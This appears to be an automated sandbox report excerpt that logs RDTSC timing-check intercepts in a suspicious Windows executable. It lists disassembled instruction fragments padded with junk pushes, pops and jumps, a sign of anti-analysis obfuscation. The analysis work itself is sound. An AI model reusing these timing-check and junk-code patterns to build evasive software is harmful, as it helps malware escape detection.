    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34241 second address: A3424B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB418E0AE76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A38FE2 second address: A38FF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418AEFE48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB418AEFE46h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A38FF9 second address: A38FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34326 second address: A34330 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34330 second address: A34337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B085 second address: A3B089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C098 second address: A3C09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C09E second address: A3C0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0A3 second address: A3C0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0BE second address: A3C0C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0C2 second address: A3C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0C8 second address: A3C159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB418AEFE48h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov bx, ax 0x00000027 push 00000000h 0x00000029 jmp 00007FB418AEFE4Dh 0x0000002e push 00000000h 0x00000030 jng 00007FB418AEFE49h 0x00000036 movsx ebx, si 0x00000039 xchg eax, esi 0x0000003a jnl 00007FB418AEFE5Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 push edx 0x00000043 jmp 00007FB418AEFE57h 0x00000048 pop edx 0x00000049 pushad 0x0000004a jng 00007FB418AEFE46h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D19C second address: A3D1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B22F second address: A3B239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B239 second address: A3B23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3E2E7 second address: A3E2F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB418AEFE46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D420 second address: A3D428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D4C5 second address: A3D4DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f ja 00007FB418AEFE46h 0x00000015 pop edi 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F4A0 second address: A3F4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F5E9 second address: A3F5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F5F5 second address: A3F5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A417CB second address: A417DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A6D2 second address: A4A6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FB418E0AE76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A6E2 second address: A4A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A870 second address: A4A89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB418E0AE7Dh 0x0000000f jmp 00007FB418E0AE7Bh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB06 second address: A4AB29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB29 second address: A4AB51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418E0AE7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FB418E0AE76h 0x00000012 jnc 00007FB418E0AE76h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB51 second address: A4AB57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F13F second address: A4F15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F15A second address: A4F164 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418AEFE61h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F164 second address: A4F19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE85h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB418E0AE89h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52C48 second address: A52C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418AEFE52h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FB418AEFE57h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52D65 second address: A52D6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418E0AE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F54 second address: A52F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F59 second address: A52F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F5F second address: 8849E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3AE9F196h 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0DD1h] 0x00000016 jmp 00007FB418AEFE59h 0x0000001b call dword ptr [ebp+122D3904h] 0x00000021 pushad 0x00000022 cmc 0x00000023 xor eax, eax 0x00000025 pushad 0x00000026 jmp 00007FB418AEFE4Ch 0x0000002b mov ebx, 02FD5347h 0x00000030 popad 0x00000031 mov dword ptr [ebp+122D1E3Dh], eax 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007FB418AEFE52h 0x00000040 mov dword ptr [ebp+122D29A2h], eax 0x00000046 clc 0x00000047 mov esi, 0000003Ch 0x0000004c xor dword ptr [ebp+122D1E3Dh], edx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 sub dword ptr [ebp+122D18DFh], ebx 0x0000005c lodsw 0x0000005e sub dword ptr [ebp+122D18DFh], edi 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 ja 00007FB418AEFE5Dh 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 mov dword ptr [ebp+122D1E3Dh], ecx 0x00000078 nop 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A58514 second address: A58547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 jmp 00007FB418E0AE81h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE89h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A58547 second address: A5854B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA19F6 second address: AA1A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB418AEFE57h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB418AEFE57h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA1A37 second address: AA1A42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FB418E0AE76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA1F68 second address: AA1F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA20ED second address: AA2115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB418E0AE80h 0x00000008 jnc 00007FB418E0AE76h 0x0000000e jc 00007FB418E0AE76h 0x00000014 popad 0x00000015 jnp 00007FB418E0AE7Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2115 second address: AA2132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB418AEFE65h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418AEFE4Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2132 second address: AA2136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2136 second address: AA213A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2274 second address: AA227E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA227E second address: AA2298 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB418AEFE55h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2298 second address: AA22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FB418E0AE76h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007FB418E0AE7Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2415 second address: AA2436 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418AEFE46h 0x00000008 jmp 00007FB418AEFE4Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB418AEFE46h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2436 second address: AA2440 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA334A second address: AA3371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE59h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA3371 second address: AA3377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA6678 second address: AA6699 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB418AEFE59h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA9830 second address: AA9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA9837 second address: AA983C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE4E9 second address: AAE503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418E0AE7Eh 0x00000008 pop eax 0x00000009 jl 00007FB418E0AE7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE0B7 second address: AAE0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB418AEFE4Ah 0x0000000b popad 0x0000000c pop edi 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FB418AEFE46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AAE0DA second address: AAE0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9832 second address: AB9836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9972 second address: AB9982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jc 00007FB418E0AE7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9982 second address: AB998A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB998A second address: AB9994 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418E0AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AB9994 second address: AB99A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FB418AEFE46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0417 second address: AC041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC041C second address: AC0424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0424 second address: AC0468 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB418E0AE7Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007FB418E0AE78h 0x00000015 jc 00007FB418E0AE7Ah 0x0000001b pushad 0x0000001c popad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jmp 00007FB418E0AE83h 0x00000024 push eax 0x00000025 push edx 0x00000026 ja 00007FB418E0AE76h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC0468 second address: AC046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC549C second address: AC54D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ch 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FB418E0AE7Eh 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 jnc 00007FB418E0AE7Ch 0x00000019 jp 00007FB418E0AE76h 0x0000001f pushad 0x00000020 jp 00007FB418E0AE76h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AC6C6D second address: AC6C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD16DD second address: AD16EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418E0AE76h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD16EB second address: AD1714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418AEFE46h 0x0000000a jp 00007FB418AEFE46h 0x00000010 jmp 00007FB418AEFE54h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AD157A second address: AD157E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADBA07 second address: ADBA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADBA0B second address: ADBA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA21E second address: ADA227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA227 second address: ADA237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a ja 00007FB418E0AE76h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA237 second address: ADA24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FB418AEFE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007FB418AEFE46h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA386 second address: ADA38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA38A second address: ADA38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA38E second address: ADA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA398 second address: ADA39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA39C second address: ADA3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB418E0AE7Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: ADA3AA second address: ADA3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jp 00007FB418AEFE46h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB418AEFE51h 0x0000001c jmp 00007FB418AEFE4Ch 0x00000021 rdtsc
